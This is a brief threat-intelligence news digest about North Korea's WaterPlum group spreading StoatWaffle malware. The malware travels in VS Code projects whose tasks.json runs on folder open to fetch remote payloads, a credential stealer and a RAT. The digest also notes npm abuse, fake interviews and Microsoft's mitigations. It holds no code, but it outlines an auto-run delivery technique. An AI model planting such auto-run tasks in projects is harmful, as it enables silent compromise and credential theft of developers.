North Korean threat actor WaterPlum (aka Contagious Interview) is distributing the Node.js StoatWaffle malware through malicious Visual Studio Code projects that auto-run tasks.json to fetch and execute payloads. The campaign delivers a browser credential stealer and a RAT, abuses npm packages and compromised GitHub repositories, targets developers and crypto professionals via fake interviews and LinkedIn lures, and prompted Microsoft mitigations in VS Code 1.109/1.110. #StoatWaffle #ContagiousInterview
Keypoints
- WaterPlum (Contagious Interview) distributes StoatWaffle via malicious VS Code projects using tasks.json with runOn: folderOpen.
- The malware installs Node.js if absent and runs a staged downloader chain that executes Node.js code from external servers.
- StoatWaffle includes a stealer that exfiltrates browser credentials (and iCloud Keychain on macOS) and a RAT that executes commands and transfers files.
- The threat actor also leverages malicious npm packages, obfuscated GitHub payloads, compromised contributor accounts, and social-engineered fake interviews to target developers and crypto personnel.
- Microsoft added task.allowAutomaticTasks and extra prompts in VS Code 1.109/1.110, and U.S. authorities have prosecuted individuals tied to North Koreaβs IT worker scheme.
Read More: https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html